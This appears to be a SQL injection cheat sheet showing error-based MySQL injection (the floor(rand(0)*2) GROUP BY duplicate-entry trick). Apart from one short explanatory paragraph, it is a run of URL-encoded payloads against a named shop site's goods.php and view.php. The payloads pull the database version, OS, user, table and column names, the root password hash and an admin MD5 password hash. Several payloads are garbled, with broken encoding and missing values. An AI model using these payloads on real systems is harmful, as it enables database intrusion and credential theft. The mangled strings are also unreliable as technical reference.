And (select 1 from (select count (*), concat (select distinct concat (0x7e, 0x27, Hex (cast (table_name as char )), 0x27, 0x7e) FROM information_schema.tables Where table_schema = limit) from information_schema.tables limit), floor (rand (0) * 2) x from information_schema.tables group by x) a) and 1 = 1
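When concat(), floor(rand(0) * 2) and GROUP BY appear together in one query, MySQL may report a duplicate-entry error, and the error message contains the concatenated value. The technique depends on the application returning the raw database error to the client; parameterized queries remove the injection point itself, and generic error pages close this error channel.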
Determine the version number
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 @ version % 20), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Determine the operating system
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 @ version_compile_ OS % 20), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Current user: user()
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 user () % 20), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Current database: database()
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 database () % 20), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Password hash of the root account
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 Password % 20 from % 20mysql. user % 20 where % 20 User = char (114,111,111,116), 0x3a, floor (rand () * 2 )) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Table names in the current database
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20TABLE_NAME % 20% 20 from % 20information_schema.tables % 20 where % 20TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49) % 20 limit % 206,1), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
The user_name column in the current database
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20% 20COLUMN_NAME % 20 from % 20information_schema.COLUMNS % 20 where % 20TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49) % 20and % 20TABLE_NAME = char (, 115,95, 97,100,109,105,110, 95,117,115,101,114) % 20 limit % 202,1), 0x3a, floor (rand () * 2 )) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
The password column in the current database
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20% 20COLUMN_NAME % 20 from % 20information_schema.COLUMNS % 20 where % 20TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49) % 20and % 20TABLE_NAME = char (, 115,95, 97,100,109,105,110, 95,117,115,101,114) % 20 limit % 204,1), 0x3a, floor (rand () * 2 )) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Obtain the admin password (MD5 hash)
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20concat_ws (char (94 ), ifnull (cast (% 60 password % 60% 20as % 20 char), char (32), ifnull (cast (% 60user_name % 60% 20as % 20 char ), char (32) % 20% 20 from % 20sansan1. ecs_admin_user % 20 limit % 201%), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 202 20 union % 20 select %) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Exp: http://www.bkjia.com/shop/board/view.php? Id = pnotes & no = 33% 20and (select % 201% 20 from (select % 20 count (*), concat (select % 20 (select % 20 (SELECT % 20 distinct % 20 concat (0x7e, 0x27, Hex (cast (table_name % 20as % 20 char )), 0x27, 0x7e) % 20 FROM % 20information_schema.tables % 20 Where % 20table_schema = limit % 20 limit % ,,1) % 20 from % 20information_schema.tables % 20 limit % 200,1 ), floor (rand (0) * 2) x % 20 from % 20information_schema.tables % 20 group % 20by % 20x) a) % 20and % 201 = 1